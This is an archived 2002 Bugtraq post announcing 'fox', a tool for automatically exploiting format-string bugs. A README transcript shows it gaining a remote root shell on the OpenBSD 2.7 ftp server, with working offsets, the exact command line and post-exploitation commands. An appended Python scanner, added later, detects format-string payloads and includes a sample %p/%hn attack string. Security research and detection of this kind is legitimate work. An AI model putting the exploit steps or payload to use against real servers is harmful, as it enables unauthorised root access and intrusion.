Bugtraq mailing list archives

Re: Howto exploit a remote format bug automatically


From: Fredrik Widlund <fredrik.widlund () defcom com>
Date: Fri, 19 Apr 2002 12:57:52 +0100

Hi

"fox", a tool I wrote for automatically exploiting any (or most) format bugs, 
locally and remotely. Runs on OpenBSD and is not ported to other platforms, 
though it should be very straightforward. 

The only requirement is that you get the actual printed string back to the 
program, in the case of the OpenBSD 2.7 ftpd you need to proxy this through a 
small shell program since the output occurs in the process listing.

Should work for exploiting bugs on most little-endian 32-bit machines like the 
i386, providing you supply the shellcode.

Includes a trivial local example, and an example of how to point it at the 
OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.

Regards,
Fredrik Widlund

-x-

README for example 2:
Exploiting OpenBSD 2.7 ftp server

Input has to be < 256 characters, working offsets are -18 and -2
Ex:

root@wolf> ./fox -s 220 -p 50 -o-18 ex2/ex2
alignment               0
chars before argument   111
chars before insert     0
argument offset         9
argument pointer offset 0
argument address        0xdfbfd15c
esp                     0xdfbfd138

uid=0(root) gid=0(wheel) groups=0(wheel)
root@wolf> nc 127.0.0.1 21
id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD wolf 2.7 GENERIC#0 i386
cat /etc/hosts
exit
root@wolf>

Attachment: fox0.1.tgz
Description: format bug exploiter
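On the detection side, an added example that is not part of the post or of the fox tool: a small Python scanner that flags input lines carrying the format-string signature visible in the ex2 transcript (a run of %p stack probes followed by wide-padded %x / %hn pairs). The FTP command lines and the alert thresholds are constructed assumptions for the demo.

```python
import re

# Matches one printf-style conversion: flags, width, precision, length, conversion char.
CONVERSION_RE = re.compile(
    r"%[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?(?:hh|h|ll|l|q|j|z|t|L)?[diouxXeEfFgGaAcspn%]"
)

# Constructed FTP command lines; the third carries the %p/%hn pattern from the
# ex2 transcript above, with the binary address bytes left out.
SAMPLE_LINES = [
    "USER anonymous",
    "RETR sales-100%.txt",
    "PASS AAAA%p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn",
    "SITE CHMOD 755 file%08x",
]


def format_indicators(line: str) -> dict:
    """Count the conversions that matter when user data reaches printf()."""
    convs = [c for c in CONVERSION_RE.findall(line) if c != "%%"]
    # %n / %hn / %hhn write the number of bytes printed so far into memory.
    writes = sum(1 for c in convs if c.endswith("n"))
    # %p / %x read stack words back to the caller (the "printed string" fox relies on).
    reads = sum(1 for c in convs if c[-1] in "px")
    # Large field widths set the byte count that a following %hn stores.
    widths = [int(m.group(0)) for c in convs if (m := re.search(r"\d+", c))]
    padded = sum(1 for w in widths if w >= 100)
    return {"conversions": len(convs), "writes": writes, "reads": reads, "padded": padded}


def is_format_string_attack(line: str) -> bool:
    """Assumed thresholds: any memory-writing conversion, or a run of stack probes."""
    ind = format_indicators(line)
    return ind["writes"] > 0 or ind["reads"] >= 4


def scan(lines):
    """Return (line, flagged) pairs; intended to run over an ftpd or inetd command log."""
    return [(line, is_format_string_attack(line)) for line in lines]


if __name__ == "__main__":
    for line, flagged in scan(SAMPLE_LINES):
        print("ALERT " if flagged else "ok    ", line)
```

A single %08x in a filename is left alone; only memory-writing conversions or a run of probes trips the alert, which keeps ordinary percent signs in paths quiet.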
